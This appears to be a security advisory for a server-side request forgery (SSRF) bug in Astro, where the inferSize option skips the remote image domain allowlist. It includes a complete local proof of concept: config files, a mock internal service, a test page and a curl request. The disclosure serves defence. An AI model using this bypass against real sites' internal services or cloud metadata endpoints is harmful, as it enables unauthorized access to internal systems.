A bug in Astro's image pipeline allows bypassing image.domains / image.remotePatterns restrictions, enabling the server to fetch content from unauthorized remote hosts.
Astro provides an inferSize option that fetches remote images at render time to determine their dimensions. Remote image fetches are intended to be restricted to domains the site developer has manually authorized (using the image.domains or image.remotePatterns options).
However, when inferSize is used, no domain validation is performed — the image is fetched from any host regardless of the configured restrictions. An attacker who can influence the image URL (e.g., via CMS content or user-supplied data) can cause the server to fetch from arbitrary hosts.
<details>
Create a new Astro project with the following files:
package.json:
{
"name": "poc-ssrf-infersize",
"private": true,
"scripts": {
"dev": "astro dev --port 4322",
"build": "astro build"
},
"dependencies": {
"astro": "5.17.2",
"@astrojs/node": "9.5.3"
}
}
astro.config.mjs — only localhost:9000 is authorized:
import { defineConfig } from 'astro/config';
import node from '@astrojs/node';
export default defineConfig({
output: 'server',
adapter: node({ mode: 'standalone' }),
image: {
remotePatterns: [
{ hostname: 'localhost', port: '9000' }
]
}
});
internal-service.mjs — simulates an internal service on a non-allowlisted host (127.0.0.1:8888):
import { createServer } from 'node:http';
const GIF = Buffer.from('R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==', 'base64');
createServer((req, res) => {
console.log(`[INTERNAL] Received: ${req.method} ${req.url}`);
res.writeHead(200, { 'Content-Type': 'image/gif', 'Content-Length': GIF.length });
res.end(GIF);
}).listen(8888, '127.0.0.1', () => console.log('Internal service on 127.0.0.1:8888'));
src/pages/test.astro:
---
import { getImage } from 'astro:assets';
const result = await getImage({
src: 'http://127.0.0.1:8888/internal-api',
inferSize: true,
alt: 'test'
});
---
<html><body>
<p>Width: {result.options.width}, Height: {result.options.height}</p>
</body></html>
Run npm install and start the internal service:
node internal-service.mjs
Start the dev server:
npm run dev
Request the page:
curl http://localhost:4322/test
internal-service.mjs logs Received: GET /internal-api — the request was sent to 127.0.0.1:8888 despite only localhost:9000 being in the allowlist.
</details>
Allows bypassing image.domains / image.remotePatterns restrictions to make server-side requests to unauthorized hosts. This includes the risk of server-side request forgery (SSRF) against internal network services and cloud metadata endpoints.
{
"nvd_published_at": "2026-02-26T01:16:24Z",
"github_reviewed_at": "2026-02-25T18:11:47Z",
"github_reviewed": true,
"cwe_ids": [
"CWE-918"
],
"severity": "MODERATE"
}